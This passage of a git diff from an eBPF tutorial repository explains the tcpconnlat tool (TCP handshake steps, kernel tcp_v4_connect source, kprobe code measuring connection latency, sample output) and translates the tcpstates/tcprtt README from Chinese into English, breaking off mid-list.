Client handles the SYN/ACK: The client kernel receives and handles the SYN/ACK packet, then sends ACK. This mainly involves software interrupt handling cost. -6. ACK packet is transmitted to the server: This is the third network transmission. -7. Server receives ACK: The server kernel receives and handles the ACK, then moves the corresponding connection from the listen queue to the established queue. This involves CPU time cost of a software interrupt. -8. Wake up the server-side user process: The user process blocked by the `accept()` system call is awakened, and then the established connection is taken out from the established queue. This involves CPU cost of a context switch. - -The complete flowchart is shown below: - -![tcpconnlat1](tcpconnlat1.png) - -From the client's perspective, under normal circumstances, the total time for a TCP connection is approximately the time consumed by one network round-trip. However, in some cases, it may cause an increase in network transmission time, an increase in CPU processing overhead, or even connection failure. When a long delay is detected, it can be analyzed in conjunction with other information. - -## eBPF Implementation of tcpconnlat - -To understand the process of establishing a TCP connection, we need to understand two queues used by the Linux kernel when handling TCP connections: - -- Listen queue (SYN queue): Stores TCP connections that are in the process of performing three-way handshake. After the server receives the SYN packet, it stores the connection information in this queue. -- Established queue (Accept queue): Stores TCP connections that have completed three-way handshake and are waiting for the application to call the `accept()` function. After the server receives the ACK packet, it creates a new connection and adds it to this queue. - -With an understanding of the purpose of these two queues, we can begin to explore the specific implementation of tcpconnlat. The implementation of tcpconnlat can be divided into two parts: kernel space and user space, which include several main trace points: `tcp_v4_connect`, `tcp_v6_connect`, and `tcp_rcv_state_process`. - -These trace points are mainly located in the TCP/IP network stack in the kernel. When executing the corresponding system call or kernel function, these trace points are activated, triggering the execution of eBPF programs. This allows us to capture and measure the entire process of establishing a TCP connection. - -Let's take a look at the source code of these mounting points first: - -```c -SEC("kprobe/tcp_v4_connect") -int BPF_KPROBE(tcp_v4_connect, struct sock *sk) -{ - return trace_connect(sk); -} - -SEC("kprobe/tcp_v6_connect") -int BPF_KPROBE(tcp_v6_connect, struct sock *sk) -{ - return trace_connect(sk); -} - -SEC("kprobe/tcp_rcv_state_process") -int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk) -{ - return handle_tcp_rcv_state_process(ctx, sk); -} -``` - -This code snippet shows the definition of three kernel probes (kprobe). `tcp_v4_connect` and `tcp_v6_connect` are triggered when the corresponding IPv4 and IPv6 connections are initialized, invoking the `trace_connect()` function. On the other hand, `tcp_rcv_state_process` is triggered when the TCP connection state changes in the kernel, calling the `handle_tcp_rcv_state_process()` function. - -The following section will be divided into two parts: one part analyzes the kernel part of these mount points, where we will delve into the kernel source code to explain how these functions work in detail. 
The other part analyzes the user part, focusing on how eBPF programs collect data from these mount points and interact with user-space programs. - -### Analysis of tcp_v4_connect function - -The `tcp_v4_connect` function is the main way that the Linux kernel handles TCP IPv4 connection requests. When a user-space program creates a socket through the `socket` system call and then attempts to connect to a remote server through the `connect` system call, the `tcp_v4_connect` function is triggered. - -```c -/* This will initiate an outgoing connection. */ -int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len) -{ - struct sockaddr_in *usin = (struct sockaddr_in *)uaddr; - struct inet_timewait_death_row *tcp_death_row; - struct inet_sock *inet = inet_sk(sk); - struct tcp_sock *tp = tcp_sk(sk); - struct ip_options_rcu *inet_opt; - struct net *net = sock_net(sk); - __be16 orig_sport, orig_dport; - __be32 daddr, nexthop; - struct flowi4 *fl4; - struct rtable *rt; - int err; - - if (addr_len < sizeof(struct sockaddr_in)) - return -EINVAL; - - if (usin->sin_family != AF_INET) - return -EAFNOSUPPORT; - - nexthop = daddr = usin->sin_addr.s_addr; - inet_opt = rcu_dereference_protected(inet->inet_opt, - lockdep_sock_is_held(sk)); - if (inet_opt && inet_opt->opt.srr) { - if (!daddr) - return -EINVAL; - nexthop = inet_opt->opt.faddr; - } - - orig_sport = inet->inet_sport; - orig_dport = usin->sin_port; - fl4 = &inet->cork.fl.u.ip4; - rt = ip_route_connect(fl4, nexthop, inet->inet_saddr, - sk->sk_bound_dev_if, IPPROTO_TCP, orig_sport, - orig_dport, sk); - if (IS_ERR(rt)) { - err = PTR_ERR(rt); - if (err == -ENETUNREACH) - IP_INC_STATS(net, IPSTATS_MIB_OUTNOROUTES); - return err; - } - - if (rt->rt_flags & (RTCF_MULTICAST | RTCF_BROADCAST)) { - ip_rt_put(rt); - return -ENETUNREACH; - } - if (!inet_opt || !inet_opt->opt.srr) - daddr = fl4->daddr; - - tcp_death_row = &sock_net(sk)->ipv4.tcp_death_row; - - if (!inet->inet_saddr) { - err = inet_bhash2_update_saddr(sk, &fl4->saddr, AF_INET); - if (err) { - ip_rt_put(rt); - return err; - } - } else { - sk_rcv_saddr_set(sk, inet->inet_saddr); - } - - if (tp->rx_opt.ts_recent_stamp && inet->inet_daddr != daddr) { - /* Reset inherited state */ - tp->rx_opt.ts_recent = 0; - tp->rx_opt.ts_recent_stamp = 0; - if (likely(!tp->repair)) - WRITE_ONCE(tp->write_seq, 0); - } - - inet->inet_dport = usin->sin_port; - sk_daddr_set(sk, daddr); - - inet_csk(sk)->icsk_ext_hdr_len = 0; - if (inet_opt) - inet_csk(sk)->icsk_ext_hdr_len = inet_opt->opt.optlen; - - tp->rx_opt.mss_clamp = TCP_MSS_DEFAULT; - - /* Socket identity is still unknown (sport may be zero). - * However we set state to SYN-SENT and not releasing socket - * lock select source port, enter ourselves into the hash tables and - * complete initialization after this. - */ - tcp_set_state(sk, TCP_SYN_SENT); - err = inet_hash_connect(tcp_death_row, sk); - if (err) - goto failure; - - sk_set_txhash(sk); - - rt = ip_route_newports(fl4, rt, orig_sport, orig_dport, - inet->inet_sport, inet->inet_dport, sk); - if (IS_ERR(rt)) { - err = PTR_ERR(rt); - rt = NULL; - goto failure; - } - /* OK, now commit destination to socket. 
*/ - sk->sk_gso_type = SKB_GSO_TCPV4; - sk_setup_caps(sk, &rt->dst); - rt = NULL; - - if (likely(!tp->repair)) { - if (!tp->write_seq) - WRITE_ONCE(tp->write_seq, - secure_tcp_seq(inet->inet_saddr, - inet->inet_daddr, - inet->inet_sport, - usin->sin_port)); - tp->tsoffset = secure_tcp_ts_off(net, inet->inet_saddr, - inet->inet_daddr); - } - - inet->inet_id = get_random_u16(); - - if (tcp_fastopen_defer_connect(sk, &err)) - return err; - if (err) - goto failure; - - err = tcp_connect(sk); - - if (err) - goto failure; - - return 0; - -failure: - /* - * This unhashes the socket and releases the local port, - * if necessary. - */ - tcp_set_state(sk, TCP_CLOSE); - inet_bhash2_reset_saddr(sk); - ip_rt_put(rt); - sk->sk_route_caps = 0; - inet->inet_dport = 0; - return err; -} -EXPORT_SYMBOL(tcp_v4_connect); -``` - -Reference link: - -Next, let's analyze this function step by step: - -First, this function takes three parameters: a socket pointer `sk`, a pointer to the socket address structure `uaddr`, and the length of the address `addr_len`. - -```c -int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len) -``` - -The function starts by checking the parameters, making sure the address length is correct and the address family is IPv4. If these conditions are not met, the function returns an error. - -Next, the function retrieves the destination address and, if a source routing option is set (an advanced IP feature that is typically not used), it also retrieves the next hop address for the source route. - -```c -nexthop = daddr = usin->sin_addr.s_addr; -inet_opt = rcu_dereference_protected(inet->inet_opt, - lockdep_sock_is_held(sk)); -if (inet_opt && inet_opt->opt.srr) { - if (!daddr) - return -EINVAL; - nexthop = inet_opt->opt.faddr; -} -``` - -Then, using this information, the function looks for a route entry to the destination address. If a route entry cannot be found or the route entry points to a multicast or broadcast address, the function returns an error. - -Next, it updates the source address, handles the state of some TCP timestamp options, and sets the destination port and address. After that, it updates some other socket and TCP options and sets the connection state to `SYN-SENT`. - -Then, the function tries to add the socket to the connected sockets hash table using the `inet_hash_connect` function. If this step fails, it restores the socket state and returns an error. - -If all the previous steps succeed, it then updates the route entry with the new source and destination ports. If this step fails, it cleans up resources and returns an error. - -Next, it commits the destination information to the socket and selects a secure random value for the sequence offset for future segments. - -Then, the function tries to establish the connection using TCP Fast Open (TFO), and if TFO is not available or the TFO attempt fails, it falls back to the regular TCP three-way handshake for connection. - -Finally, if all the above steps succeed, the function returns success; otherwise, it cleans up all resources and returns an error. - -In summary, the `tcp_v4_connect` function is a complex function that handles TCP connection requests. It handles many cases, including parameter checking, route lookup, source address selection, source routing, TCP option handling, TCP Fast Open, and more. Its main goal is to establish TCP connections as safely and efficiently as possible.
- -### Kernel Code - -```c -// SPDX-License-Identifier: GPL-2.0 -// Copyright (c) 2020 Wenbo Zhang -#include <vmlinux.h> -#include <bpf/bpf_helpers.h> -#include <bpf/bpf_core_read.h> -#include <bpf/bpf_tracing.h> -#include "tcpconnlat.h" - -#define AF_INET 2 -#define AF_INET6 10 - -const volatile __u64 targ_min_us = 0; -const volatile pid_t targ_tgid = 0; - -struct piddata { - char comm[TASK_COMM_LEN]; - u64 ts; - u32 tgid; -}; - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 4096); - __type(key, struct sock *); - __type(value, struct piddata); -} start SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); - __uint(key_size, sizeof(u32)); - __uint(value_size, sizeof(u32)); -} events SEC(".maps"); - -static int trace_connect(struct sock *sk) -{ - u32 tgid = bpf_get_current_pid_tgid() >> 32; - struct piddata piddata = {}; - - if (targ_tgid && targ_tgid != tgid) - return 0; - - bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm)); - piddata.ts = bpf_ktime_get_ns(); - piddata.tgid = tgid; - bpf_map_update_elem(&start, &sk, &piddata, 0); - return 0; -} - -static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk) -{ - struct piddata *piddatap; - struct event event = {}; - s64 delta; - u64 ts; - - if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT) - return 0; - - piddatap = bpf_map_lookup_elem(&start, &sk); - if (!piddatap) - return 0; - - ts = bpf_ktime_get_ns(); - delta = (s64)(ts - piddatap->ts); - if (delta < 0) - goto cleanup; - - event.delta_us = delta / 1000U; - if (targ_min_us && event.delta_us < targ_min_us) - goto cleanup; - __builtin_memcpy(&event.comm, piddatap->comm, - sizeof(event.comm)); - event.ts_us = ts / 1000; - event.tgid = piddatap->tgid; - event.lport = BPF_CORE_READ(sk, __sk_common.skc_num); - event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport); - event.af = BPF_CORE_READ(sk, __sk_common.skc_family); - if (event.af == AF_INET) { - event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr); - event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr); - } else { - BPF_CORE_READ_INTO(&event.saddr_v6, sk, - __sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32); - BPF_CORE_READ_INTO(&event.daddr_v6, sk, - __sk_common.skc_v6_daddr.in6_u.u6_addr32); - } - bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, - &event, sizeof(event)); - -cleanup: - bpf_map_delete_elem(&start, &sk); - return 0; -} - -SEC("kprobe/tcp_v4_connect") -int BPF_KPROBE(tcp_v4_connect, struct sock *sk) -{ - return trace_connect(sk); -} - -SEC("kprobe/tcp_v6_connect") -int BPF_KPROBE(tcp_v6_connect, struct sock *sk) -{ - return trace_connect(sk); -} - -SEC("kprobe/tcp_rcv_state_process") -int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk) -{ - return handle_tcp_rcv_state_process(ctx, sk); -} - -SEC("fentry/tcp_v4_connect") -int BPF_PROG(fentry_tcp_v4_connect, struct sock *sk) -{ - return trace_connect(sk); -} - -SEC("fentry/tcp_v6_connect") -int BPF_PROG(fentry_tcp_v6_connect, struct sock *sk) -{ - return trace_connect(sk); -} - -SEC("fentry/tcp_rcv_state_process") -int BPF_PROG(fentry_tcp_rcv_state_process, struct sock *sk) -{ - return handle_tcp_rcv_state_process(ctx, sk); -} - -char LICENSE[] SEC("license") = "GPL"; -``` - -This eBPF (Extended Berkeley Packet Filter) program is mainly used to monitor and collect the time it takes to establish TCP connections, i.e., the time interval from initiating a TCP connection request (connect system call) to the completion of the connection establishment (SYN-ACK handshake process).
This is very useful for monitoring network latency, service performance analysis, and other aspects. - -First, two eBPF maps are defined: `start` and `events`. `start` is a hash table used to store the process information and timestamp of the initiating connection request, while `events` is a map of type `PERF_EVENT_ARRAY` used to transfer event data to user space. - -```c -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 4096); - __type(key, struct sock *); - __type(value, struct piddata); -} start SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); - __uint(key_size, sizeof(u32)); - __uint(value_size, sizeof(u32)); -} events SEC(".maps"); -``` - -In the kprobe handling functions `trace_connect` of `tcp_v4_connect` and `tcp_v6_connect`, the process information (process name, process ID, and current timestamp) of the initiating connection request is recorded and stored in the `start` map with the socket structure as the key. - -```c -static int trace_connect(struct sock *sk) -{ - u32 tgid = bpf_get_current_pid_tgid() >> 32; - struct piddata piddata = {}; - - if (targ_tgid && targ_tgid != tgid) - return 0; - - bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm)); - piddata.ts = bpf_ktime_get_ns(); - piddata.tgid = tgid; - bpf_map_update_elem(&start, &sk, &piddata, 0); - return 0; -} -``` - -When the TCP state machine processes the SYN-ACK packet, i.e., when the connection is established, the kprobe handling function `handle_tcp_rcv_state_process` of `tcp_rcv_state_process` is triggered. In this function, it first checks if the socket state is `SYN-SENT`. If it is, it looks up the process information for the socket in the `start` map. Then it calculates the time interval from the initiation of the connection to the present and sends this time interval, process information, and TCP connection details (source port, destination port, source IP, destination IP, etc.) as an event to user space using the `bpf_perf_event_output` function. - -```c -static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk) -{ - struct piddata *piddatap; - struct event event = {}; - s64 delta; - u64 ts; - - if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT) - return 0; - - piddatap = bpf_map_lookup_elem(&start, &sk); - if (!piddatap) - return 0; - - ts = bpf_ktime_get_ns(); - delta = (s64)(ts - piddatap->ts); - if (delta < 0) - goto cleanup; - - event.delta_us = delta / 1000U; - if (targ_min_us && event.delta_us < targ_min_us) - goto cleanup; - __builtin_memcpy(&event.comm, piddatap->comm, - sizeof(event.comm)); - event.ts_us = ts / 1000; - event.tgid = piddatap->tgid; - event.lport = BPF_CORE_READ(sk, __sk_common.skc_num); - event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport); - event.af = BPF_CORE_READ(sk, __sk_common.skc_family); - if (event.af == AF_INET) { - event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr); - event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr); - } else { - BPF_CORE_READ_INTO(&event.saddr_v6, sk, - __sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32); - BPF_CORE_READ_INTO(&event.daddr_v6, sk, - __sk_common.skc_v6_daddr.in6_u.u6_addr32); - } - bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, - &event, sizeof(event)); - -cleanup: - bpf_map_delete_elem(&start, &sk); - return 0; -} -``` - -This program uses a while loop to repeatedly poll the perf event buffer. If there is an error during polling (e.g., due to a signal interruption), an error message will be printed. 
This polling process continues until an exit flag `exiting` is received. - -Next, let's take a look at the `handle_event` function, which handles every eBPF event sent from the kernel to user space: - -```c -void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) { - const struct event* e = data; - char src[INET6_ADDRSTRLEN]; - char dst[INET6_ADDRSTRLEN]; - union { - struct in_addr x4; - struct in6_addr x6; - } s, d; - static __u64 start_ts; - - if (env.timestamp) { - if (start_ts == 0) - start_ts = e->ts_us; - printf("%-9.3f ", (e->ts_us - start_ts) / 1000000.0); - } - if (e->af == AF_INET) { - s.x4.s_addr = e->saddr_v4; - d.x4.s_addr = e->daddr_v4; - } else if (e->af == AF_INET6) { - memcpy(&s.x6.s6_addr, e->saddr_v6, sizeof(s.x6.s6_addr)); - memcpy(&d.x6.s6_addr, e->daddr_v6, sizeof(d.x6.s6_addr)); - } else { - fprintf(stderr, "broken event: event->af=%d", e->af); - return; - } - - if (env.lport) { - printf("%-6d %-12.12s %-2d %-16s %-6d %-16s %-5d %.2f\n", e->tgid, - e->comm, e->af == AF_INET ? 4 : 6, - inet_ntop(e->af, &s, src, sizeof(src)), e->lport, - inet_ntop(e->af, &d, dst, sizeof(dst)), ntohs(e->dport), - e->delta_us / 1000.0); - } else { - printf("%-6d %-12.12s %-2d %-16s %-16s %-5d %.2f\n", e->tgid, e->comm, - e->af == AF_INET ? 4 : 6, inet_ntop(e->af, &s, src, sizeof(src)), - inet_ntop(e->af, &d, dst, sizeof(dst)), ntohs(e->dport), - e->delta_us / 1000.0); - } -} -``` - -The `handle_event` function takes arguments including the CPU number, a pointer to the data, and the size of the data. The data is a `event` structure that contains information about TCP connections computed in the kernel space. - -First, it compares the timestamp of the received event with the start timestamp (if available) to calculate the relative time of the event, and then prints it. Next, it converts the source address and destination address from network byte order to host byte order based on the IP address type (IPv4 or IPv6). - -Finally, depending on whether the user chooses to display the local port, it prints the process ID, process name, IP version, source IP address, local port (if available), destination IP address, destination port, and connection establishment time. This connection establishment time is calculated in the eBPF program running in the kernel space and sent to the user space. - -## Compilation and Execution - -```console -$ make -... - BPF .output/tcpconnlat.bpf.o - GEN-SKEL .output/tcpconnlat.skel.h - CC .output/tcpconnlat.o - BINARY tcpconnlat -$ sudo ./tcpconnlat -PID COMM IP SADDR DADDR DPORT LAT(ms) -222564 wget 4 192.168.88.15 110.242.68.3 80 25.29 -222684 wget 4 192.168.88.15 167.179.101.42 443 246.76 -222726 ssh 4 192.168.88.15 167.179.101.42 22 241.17 -222774 ssh 4 192.168.88.15 1.15.149.151 22 25.31 -``` - -Source code: [https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/13-tcpconnlat](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/13-tcpconnlat) - -References: - -- [tcpconnlat](https://github.com/iovisor/bcc/blob/master/libbpf-tools/tcpconnlat.c) in bcc - -## Summary - -In this eBPF introductory tutorial, we learned how to use eBPF to track and measure the latency of TCP connections. We first explored how eBPF programs can attach to specific kernel functions in kernel-space and capture the start and end times of connection establishment to calculate latency. - -We also learned how to use BPF maps to store and retrieve data in kernel-space, enabling data sharing among different parts of the eBPF program.
Additionally, we discussed how to use perf events to send data from kernel-space to user-space for further processing and display. - -In user-space, we introduced the usage of libbpf library APIs, such as perf_buffer__poll, to receive and process data sent from the kernel-space. We also demonstrated how to parse and print this data in a human-readable format. - -If you are interested in learning more about eBPF and its practical applications, please refer to the official documentation of eunomia-bpf: [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf). You can also visit our tutorial code repository at [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) for more examples and complete tutorials. - -In the upcoming tutorials, we will dive deeper into advanced features of eBPF, such as tracing the path of network packets and fine-grained system performance monitoring. We will continue to share more content on eBPF development practices to help you better understand and master eBPF technology. We hope these resources will be valuable in your learning and practical journey with eBPF. - -> The original link of this article: diff --git a/src/14-tcpstates/README.md b/src/14-tcpstates/README.md index 6bf2c8d..189474d 100644 --- a/src/14-tcpstates/README.md +++ b/src/14-tcpstates/README.md @@ -1,16 +1,16 @@ -# eBPF入门实践教程十四:记录 TCP 连接状态与 TCP RTT +# eBPF Tutorial by Example 14: Recording TCP Connection Status and TCP RTT -eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or changing the kernel source code. -在我们的 eBPF 入门实践教程系列的这一篇,我们将介绍两个示例程序:`tcpstates` 和 `tcprtt`。`tcpstates` 用于记录 TCP 连接的状态变化,而 `tcprtt` 则用于记录 TCP 的往返时间 (RTT, Round-Trip Time)。 +In this article of our eBPF Tutorial by Example series, we will introduce two sample programs: `tcpstates` and `tcprtt`. `tcpstates` is used to record the state changes of TCP connections, while `tcprtt` is used to record the Round-Trip Time (RTT) of TCP. -## `tcprtt` 与 `tcpstates` +## `tcprtt` and `tcpstates` -网络质量在当前的互联网环境中至关重要。影响网络质量的因素有许多,包括硬件、网络环境、软件编程的质量等。为了帮助用户更好地定位网络问题,我们引入了 `tcprtt` 这个工具。`tcprtt` 可以监控 TCP 链接的往返时间,从而评估网络质量,帮助用户找出可能的问题所在。 +Network quality is crucial in the current Internet environment. There are many factors that affect network quality, including hardware, network environment, and the quality of software programming. To help users better locate network issues, we introduce the tool `tcprtt`. `tcprtt` can monitor the Round-Trip Time of TCP connections, evaluate network quality, and help users identify potential problems. -当 TCP 链接建立时,`tcprtt` 会自动根据当前系统的状况,选择合适的执行函数。在执行函数中,`tcprtt` 会收集 TCP 链接的各项基本信息,如源地址、目标地址、源端口、目标端口、耗时等,并将这些信息更新到直方图型的 BPF map 中。运行结束后,`tcprtt` 会通过用户态代码,将收集的信息以图形化的方式展示给用户。 +When a TCP connection is established, `tcprtt` automatically selects the appropriate execution function based on the current system conditions. In the execution function, `tcprtt` collects various basic information of the TCP connection, such as source address, destination address, source port, destination port, and time elapsed, and updates this information to a histogram-like BPF map. 
After the execution is completed, `tcprtt` presents the collected information graphically to users through user-mode code. -`tcpstates` 则是一个专门用来追踪和打印 TCP 连接状态变化的工具。它可以显示 TCP 连接在每个状态中的停留时长,单位为毫秒。例如,对于一个单独的 TCP 会话,`tcpstates` 可以打印出类似以下的输出: +`tcpstates` is a tool specifically designed to track and print changes in TCP connection status. It can display the duration of TCP connections in each state, measured in milliseconds. For example, for a single TCP session, `tcpstates` can print output similar to the following: ```sh SKADDR C-PID C-COMM LADDR LPORT RADDR RPORT OLDSTATE -> NEWSTATE MS @@ -21,13 +21,13 @@ ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 FI ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 FIN_WAIT2 -> CLOSE 0.006 ``` -以上输出中,最多的时间被花在了 ESTABLISHED 状态,也就是连接已经建立并在传输数据的状态,这个状态到 FIN_WAIT1 状态(开始关闭连接的状态)的转变过程中耗费了 176.042 毫秒。 +In the above output, the most time is spent in the ESTABLISHED state, which indicates that the connection has been established and data transmission is in progress. The transition from this state to the FIN_WAIT1 state (the beginning of connection closure) took 176.042 milliseconds. -在我们接下来的教程中,我们会更深入地探讨这两个工具,解释它们的实现原理,希望这些内容对你在使用 eBPF 进行网络和性能分析方面的工作有所帮助。 +In our upcoming tutorials, we will delve deeper into these two tools, explaining their implementation principles, and hopefully, these contents will help you in your work with eBPF for network and performance analysis. -## tcpstate +## tcpstate eBPF code -由于篇幅所限,这里我们主要讨论和分析对应的 eBPF 内核态代码实现。以下是 tcpstate 的 eBPF 代码: +Due to space constraints, here we mainly discuss and analyze the corresponding eBPF kernel-mode code implementation. The following is the eBPF code for tcpstate: ```c const volatile bool filter_by_sport = false; @@ -44,7 +44,8 @@ struct { struct { __uint(type, BPF_MAP_TYPE_HASH); __uint(max_entries, MAX_ENTRIES); __type(key, __u16); __type(value, __u16); } dports SEC(".maps"); @@ -108,7 +109,6 @@ int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx) bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32); bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_v6_daddr.in6_u.u6_addr32); } - bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(event)); if (ctx->newstate == TCP_CLOSE) @@ -120,23 +120,25 @@ int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx) } ``` -`tcpstates`主要依赖于 eBPF 的 Tracepoints 来捕获 TCP 连接的状态变化,从而跟踪 TCP 连接在每个状态下的停留时间。 +The `tcpstates` program relies on eBPF Tracepoints to capture the state changes of TCP connections, in order to track the time spent in each state of the TCP connection. -### 定义 BPF Maps +### Define BPF Maps -在`tcpstates`程序中,首先定义了几个 BPF Maps,它们是 eBPF 程序和用户态程序之间交互的主要方式。`sports`和`dports`分别用于存储源端口和目标端口,用于过滤 TCP 连接;`timestamps`用于存储每个 TCP 连接的时间戳,以计算每个状态的停留时间;`events`则是一个 perf_event 类型的 map,用于将事件数据发送到用户态。 +In the `tcpstates` program, several BPF Maps are defined, which are the primary way of interaction between the eBPF program and the user-space program. `sports` and `dports` are used to store the source and destination ports for filtering TCP connections; `timestamps` is used to store the timestamps for each TCP connection to calculate the time spent in each state; `events` is a map of type `perf_event`, used to send event data to the user-space.
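+The two filter maps are filled from user space before tracing starts. The following is a small sketch of how a comma-separated source-port list could be loaded into `sports`; the skeleton field names (`obj->maps.sports`, `obj->rodata->filter_by_sport`) follow common libbpf conventions and are assumptions rather than an exact copy of the tool's source:
+
+```c
+/* Sketch: after tcpstates_bpf__open(), the caller sets
+ * obj->rodata->filter_by_sport = true (rodata is frozen at load time);
+ * then, after tcpstates_bpf__load(), each port to match is inserted. */
+static int set_sport_filter(struct tcpstates_bpf *obj, char *ports)
+{
+    int fd = bpf_map__fd(obj->maps.sports);
+    char *tok = strtok(ports, ",");
+
+    while (tok) {
+        __u16 port = (__u16)strtol(tok, NULL, 10);
+
+        /* key and value are both __u16, matching the map definition above */
+        if (bpf_map_update_elem(fd, &port, &port, BPF_ANY))
+            return -1;
+        tok = strtok(NULL, ",");
+    }
+    return 0;
+}
+```
+
+With `filter_by_sport` set to `true`, the kernel side's `bpf_map_lookup_elem(&sports, &sport)` check silently drops every state change whose source port was not inserted here.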
-### 追踪 TCP 连接状态变化 +### Trace TCP Connection State Changes -程序定义了一个名为`handle_set_state`的函数,该函数是一个 tracepoint 类型的程序,它将被挂载到`sock/inet_sock_set_state`这个内核 tracepoint 上。每当 TCP 连接状态发生变化时,这个 tracepoint 就会被触发,然后执行`handle_set_state`函数。 +The program defines a function called `handle_set_state`, which is a program of type tracepoint and is mounted on the `sock/inet_sock_set_state` kernel tracepoint. Whenever the TCP connection state changes, this tracepoint is triggered and the `handle_set_state` function is executed. -在`handle_set_state`函数中,首先通过一系列条件判断确定是否需要处理当前的 TCP 连接,然后从`timestamps`map 中获取当前连接的上一个时间戳,然后计算出停留在当前状态的时间。接着,程序将收集到的数据放入一个 event 结构体中,并通过`bpf_perf_event_output`函数将该 event 发送到用户态。 +In the `handle_set_state` function, it first determines whether the current TCP connection needs to be processed through a series of conditional judgments, then retrieves the previous timestamp of the current connection from the `timestamps` map, and calculates the time spent in the current state. Then, the program places the collected data in an event structure and sends the event to the user-space using the `bpf_perf_event_output` function. -### 更新时间戳 +### Update Timestamps -最后,根据 TCP 连接的新状态,程序将进行不同的操作:如果新状态为 TCP_CLOSE,表示连接已关闭,程序将从`timestamps`map 中删除该连接的时间戳;否则,程序将更新该连接的时间戳。 +Finally, based on the new state of the TCP connection, the program performs different operations: if the new state is TCP_CLOSE, it means the connection has been closed and the program deletes the timestamp of that connection from the `timestamps` map; otherwise, the program updates the timestamp of the connection. -用户态的部分主要是通过 libbpf 来加载 eBPF 程序,然后通过 perf_event 来接收内核中的事件数据: +## User-Space Processing for tcpstate + +The user-space part is mainly about loading the eBPF program using libbpf and receiving event data from the kernel using perf_event: ```c static void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) { @@ -166,33 +168,28 @@ static void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) { } else { printf( "%-16llx %-7d %-10.10s %-15s %-5d %-15s %-5d %-11s -> %-11s %.3f\n", e->skaddr, e->pid, e->task, saddr, e->sport, daddr, e->dport, tcp_states[e->oldstate], tcp_states[e->newstate], (double)e->delta_us / 1000); } } ``` -`handle_event`就是这样一个回调函数,它会被 perf_event 调用,每当内核有新的事件到达时,它就会处理这些事件。 +`handle_event` is a callback function that is called by perf_event. It handles new events as they arrive from the kernel. -在`handle_event`函数中,我们首先通过`inet_ntop`函数将二进制的 IP 地址转换成人类可读的格式,然后根据是否需要输出宽格式,分别打印不同的信息。这些信息包括了事件的时间戳、源 IP 地址、源端口、目标 IP 地址、目标端口、旧状态、新状态以及在旧状态停留的时间。 +In the `handle_event` function, we first use the `inet_ntop` function to convert the binary IP address to a human-readable format. Then, based on whether the wide format is needed or not, we print different information. This information includes the timestamp of the event, source IP address, source port, destination IP address, destination port, old state, new state, and the time spent in the old state. -这样,用户就可以清晰地看到 TCP 连接状态的变化,以及每个状态的停留时间,从而帮助他们诊断网络问题。 +This allows users to see the changes in TCP connection states and the duration of each state, helping them diagnose network issues. -总结起来,用户态部分的处理主要涉及到了以下几个步骤: +In summary, the user-space part of the processing involves the following steps: -1. 使用 libbpf 加载并运行 eBPF 程序。 -2. 设置回调函数来接收内核发送的事件。 -3. 处理接收到的事件,将其转换成人类可读的格式并打印。 +1. Use libbpf to load and run the eBPF program. +2. Set up a callback function to receive events sent by the kernel. +3.
